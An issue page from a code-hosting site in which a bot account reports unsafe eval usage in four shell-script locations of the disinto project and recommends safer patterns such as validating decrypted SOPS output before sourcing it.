johba/disinto
1
0
Fork 0
Code Issues 5 Pull requests 1 Projects Releases Packages Wiki Activity Actions

SECURITY: Replace eval usage with safer alternatives #59

New issue
Closed
opened 2026-03-31 18:06:48 +00:00 by dev-bot · 0 comments
dev-bot commented 2026-03-31 18:06:48 +00:00
Collaborator
Copy link

Summary

The codebase uses eval in multiple places which can lead to code injection vulnerabilities, especially when combined with unvalidated environment variables or API responses.

Locations

  1. lib/env.sh:32 — SOPS decryption output parsed with eval
  2. lib/issue-lifecycle.sh:57 — Dynamic variable name expansion
  3. lib/issue-lifecycle.sh:74 — Dynamic variable assignment with eval
  4. lib/mirrors.sh:16eval with echo for variable expansion

Risk

  • If environment variables contain malicious content, it could be executed
  • Combined with unquoted curl URLs, could lead to command injection
  • SOPS decryption output is not verified before eval

Recommended Fix

  1. Replace eval "$(sops -d ...)" with a write-validate-source pattern: sops -d file > tmp && validate tmp && source tmp — note that source <(sops -d ...) is equally unsafe since the decrypted output is still unsanitised
  2. Use associative arrays or jq for structured data access instead of dynamic variable names
  3. Validate all input before any shell evaluation

References

  • ShellCheck warnings for eval usage
  • OWASP Command Injection prevention guide

Upstream: codeberg johba/disinto#818

## Summary The codebase uses `eval` in multiple places which can lead to code injection vulnerabilities, especially when combined with unvalidated environment variables or API responses. ## Locations 1. `lib/env.sh:32` — SOPS decryption output parsed with `eval` 2. `lib/issue-lifecycle.sh:57` — Dynamic variable name expansion 3. `lib/issue-lifecycle.sh:74` — Dynamic variable assignment with `eval` 4. `lib/mirrors.sh:16` — `eval` with `echo` for variable expansion ## Risk - If environment variables contain malicious content, it could be executed - Combined with unquoted curl URLs, could lead to command injection - SOPS decryption output is not verified before eval ## Recommended Fix 1. Replace `eval "$(sops -d ...)"` with a write-validate-source pattern: `sops -d file > tmp && validate tmp && source tmp` — note that `source <(sops -d ...)` is equally unsafe since the decrypted output is still unsanitised 2. Use associative arrays or `jq` for structured data access instead of dynamic variable names 3. Validate all input before any shell evaluation ## References - ShellCheck warnings for `eval` usage - OWASP Command Injection prevention guide --- _Upstream: codeberg johba/disinto#818_
dev-bot added the
backlog
 label 2026-03-31 18:06:48 +00:00
dev-qwen self-assigned this 2026-03-31 18:08:24 +00:00
dev-qwen added
in-progress
 and removed
backlog
 labels 2026-03-31 18:08:24 +00:00
dev-qwen removed their assignment 2026-03-31 18:28:26 +00:00
dev-qwen removed the
in-progress
 label 2026-03-31 18:28:27 +00:00
Sign in to join this conversation.
No Branch/Tag specified
Branches Tags
main
fix/issue-123
fix/issue-14
fix/issue-21
v0.1.0
Labels
Clear labels   
action

   
backlog

   
blocked

   
in-progress

   
priority

   
tech-debt

   
underspecified

   
vision
No labels
action
backlog
blocked
in-progress
priority
tech-debt
underspecified
vision
Milestone
Clear milestone
No items
No milestone
Projects
Clear projects
No items
No project
Assignees
Clear assignees
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference: johba/disinto#59
No description provided.
Delete branch "%!s()"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?